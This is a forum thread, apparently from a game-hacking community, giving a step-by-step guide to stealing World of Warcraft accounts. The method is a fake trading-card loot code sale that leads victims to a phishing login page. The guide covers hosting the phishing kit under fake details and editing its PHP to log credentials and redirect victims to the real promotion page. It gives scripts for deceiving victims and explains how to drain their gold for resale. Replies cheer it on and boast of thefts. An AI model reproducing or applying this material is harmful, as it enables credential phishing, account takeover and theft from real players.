[EPIC] A REAL twist to the In-game TCG scam. LONG POST

[Ryin]

Ok, So everyone always says there is NO WAY to twist the TCG scam any further but I have done so and am seeing a very high success rate.
With this version of the scam you will not just be getting the gold they want to trade but you will also be able to get ALL their gold, and whatever access they have to the Gbank etc.

What you need...

1). A WoW Account Manager Login phisher http://www.mmowned.com/forums/wow-sc...o-phisher.html (Edit: change to new link for improvement ) This one from Chiem is what i use.
2). Social Skills

The rest is easy.


Okay, First step is to set-up your phisher.

I suggest using freehostia.com as other sites such as 110mb have not been working as well for me lately.

Sign up with freehostia is easy just make an account and throw in some fake info to get started.

Once you have done this you will need to upload the folder in the ZIP to put the phisher up. (There are instructions on things like this elsewhere on the site)
Make sure that in the file "login.php" that you downloaded Line 14 of the code

Code:

 $fp = fopen("xxxxxxxx.txt", "a");

points to the file you created in order to save your logs. (i.e. xxxx.txt should match the name of your log file.)

The phisher from Chiem would normally direct to a second page requesting more account details but I changed the redirect to the official TCG Loot Card page so that after the victim logs in they will be taken to an official page and not realize that they have just had their account info taken.

In order to create this redirect we will go back into the file "login.php" and go to line 17 and change it to read like this...

Code:

header( 'Location: http://www.worldofwarcraft.com/misc/promotion.html' );

This will redirect your victim to the official page after inputting account info.


Okay, now that you have your phisher set up, how are you going to use it?
Why would I want it to redirect to the TCG promotion turn in page?
How am I going to spread this?


We are going to go in game on a scammed account and start the TCG scam like normal.
If you've done this scam before you know how many people ALWAYS say they want to try the code first.
That's great and that is EXACTLY what we want.
If you want you could even advertise that you will give the code first.

A lot of times I will say in trade

WTS [Reins of the Swift Spectral Tiger] Loot Code, PST, Willing to give code first for serious offers only!!

This will set the trap for many people. Some of the people that whisper you will give you much higher offers than normal because at this point they don't see how they would have there gold scammed, it's impossible if he can test the code first right?

When someone offers you money, Accept the offer if it is at least 1k... That is 5$ right? assuming thats ALL they have on their account.

The way you set up the trade is you say
"Okay the offer sounds good, I need you to show me you have the gold first"
"After you show me you have the gold I will e-mail you the code and you will need to redeem it online to get the in-game code that you turn in at Booty Bay"
Normally they respond saying okay and come to show you they have the gold, you ask for the email and get it.

What you are going to do is send them an email (From a fake email) saying Here is your code:xxxxxxxxxxxxxx (fake code 25 characters long)

and here is the site to redeem it for the in-game code: ..........................



This is where the phisher comes into play, what you are going to to do is send them a link to your phisher but dis***** it as a link to the promotion website.

The link will read WorldofWarcraft.com -> Promotion Retrieval Center but you will make it direct to your phisher, (easy to do when sending with gmail) It shows as WorldofWarcraft.com -> Promotion Retrieval Center but it might also be better to just cover it as url= http://www.worldofwarcraft.com/misc/promotion.html so they are less likely to look where the link really points to

Tell them in game that its sent and they can redeem it and see that it works then pay you.

Hopefully they fall for the trap and hit your link, they log-in thinking its the real WoW log in and then they get redirected to the TCG page where they enter your fake code.

Obivously your code won't work so at this point you just play it off and say something along the lines of
"Oh god, you know what? I bet my friend f@#$in used it. Sorry to waste your time dude"

They think that all is well, they havent lost any gold, but you have their account info!.

Just rinse and repeat getting as much account info as you can, you can login online with armory to check validity and see if maybe they are a guild officer and what they have in the bank etc.

What you are going to do now is wait until early morning when nobody is on (always create a character and make sure your victim isnt online) and then get on their characters raid them for gold and trade them off to a secondary scammed account. Then sell the gold off to a site like mmofly or mmopawn.

A couple of problems with this scam are
1) People copy and paste your link into the address bar and dont click it bypassing your phisher. Don't worry about this and just move on to a new target.

2) If someone calls you out on your phisher link, do the same thing and move on or you could maybe tell them you just googled for the link and got it off a forum and you didn't know.

3) People say they don't want to give their email, just give the code in game I normally respond to this by saying, "As I am providing you the code first I would like to have some sort of contact point outside of the game in case something happens" and you can also ask for other ways to talk to them like AIM/MSN, as long as you can get them the link you should be good.



I know there's more I'm forgetting to add so I will edit the post as needed and I also know it's really long and I'm sorry about that but I hope you enjoy.

Post Or PM me if you have any questions!!!!

The Great thing about this is that the accounts you get ALWAYS have money on them !

Also, I searched to see if this has been posted and I have seen people use TCG phishers but nothing using my exact method with the account management phisher etc. Sorry if it has been posted, not trying to steal! [/QUOTE]


edit: you can just bnet merge and authenticate accounts if your quick with cleaning (or if its off hours and blizz is closed) and not worry about the whole log on late stuff


Edit 2: Changed link to Chiem's phisher, 7/29/2009

[Gqretthx]

nice. i'll test it tonight, will give +rep if works well (sure it will ^^)

[Ryin]

If anyone has successes with this please post them!!

[unrefine]

Sounds solid.

Will defiantly try it out.

[MM2k3]

Awsome twist! Was doin a similar version of this. I sure it will work Great!!! Good job!

[Skadi]

Nice twist! +rep

[thebigman]

I love originality, and I love this twist, simply because IT WORKS.

+rep, and ill try to rep you more after spreading it some.

[L3G1T]

damn, sounds amazing. will post if it's successful!

[Ryin]

One thing to add...

Don't just log out after theyve been through the phisher... Make sure you make up some excuse to make it look like you thought it was supposed to work and your sorry.

If you don't they are much more likely to realize what happened and change their info



Oh and let me add, it is incredibly funny when someone logs out thinking they jacked a free spectral tiger, and then they go through the phisher all giddy with a fake code, hahahahaha

[Prodigal]

Great post man, wish I could keep repping ya

[Prodigal]

BTW just got an account with about 4k gold on it!

[Tinny]

Trying it out now, will get back to you asap on how it went.

[Ryin]

IF someone could make an updated phisher for the latest WoW account management page it would make this even better. I have some of the files but I can't get it all together, if someone can make it happen PM me

[death2009]

Works Perfectly i scammed many accounts this way

[Ryin]

Over 100k g,.................. In one night. Be jealous (with this method of course)